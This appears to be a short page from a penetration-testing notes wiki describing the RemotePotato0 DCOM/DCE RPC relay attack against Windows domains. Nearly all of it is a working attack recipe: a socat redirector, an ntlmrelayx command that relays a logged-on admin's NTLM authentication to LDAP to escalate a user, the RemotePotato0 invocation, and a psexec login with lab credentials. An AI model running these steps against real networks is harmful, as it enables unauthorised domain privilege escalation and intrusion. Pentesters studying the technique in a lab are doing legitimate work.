githubEdit

RemotePotato0 DCOM DCE RPC relay

It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine

Requirements

1) a shell in session 0 (e.g. WinRm shell or SSH shell)

2) a privileged user is logged on in the session 1 (e.g. a Domain Admin user)

Github repo: https://github.com/antonioCoco/RemotePotato0/

Steps

sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 (Terminal)

sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user (Terminal)

RemotePotato0.exe -r 192.168.83.130 -p 9998 -s 2 (Session 0)

psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135' (Terminal)

Last updated